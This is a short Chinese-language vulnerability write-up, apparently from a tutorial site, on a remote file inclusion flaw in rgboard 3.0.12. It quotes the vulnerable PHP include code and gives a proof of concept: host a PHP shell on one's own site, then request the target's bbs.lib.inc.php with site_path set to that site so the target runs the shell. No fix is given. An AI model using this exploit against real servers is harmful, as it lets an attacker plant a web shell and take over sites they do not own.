手机
当前位置:查字典教程网 >实用技巧 >漏洞研究 >rgboard 3.0.12 远程文件包含漏洞
rgboard 3.0.12 远程文件包含漏洞
摘要:vulcode:includebbs.lib.inc.php:if(!defined('BBS_LIB_INC_INCLUDED')){de...

vulcode:

includebbs.lib.inc.php:

if(!defined('BBS_LIB_INC_INCLUDED')){

define('BBS_LIB_INC_INCLUDED',1);

//*–BBS_LIB_INC_INCLUDEDSTART–*

if(!$site_path)$site_path='./';

require_once“{$site_path}include/lib.inc.php”;

//$site_path没有过滤直接放过来包含了

poc:

在你的网站放个phpshell,目录和文件名为/include/lib.inc.php

然后访问

httP://www.target.com/include/bbs.lib.inc.php?site_path=http://yousite/

【rgboard 3.0.12 远程文件包含漏洞】相关文章:

DVBBS7.1 SQL版 跨库漏洞

phpBB 2.0.13惊现漏洞的解决

Internet Explorer6最新漏洞代码

MSSQL自身存储过程的一个注入漏洞

用QQ文件共享漏洞彻底攻破Windows2003的坚固堡垒

OBlog任意文件下载漏洞

推荐:二次发现桃源网络硬盘漏洞

河南移动网络客服系统验证码的缺陷分析和利用!

四大漏洞入侵博客

BBSXP5.15跨站攻击漏洞

精品推荐
分类导航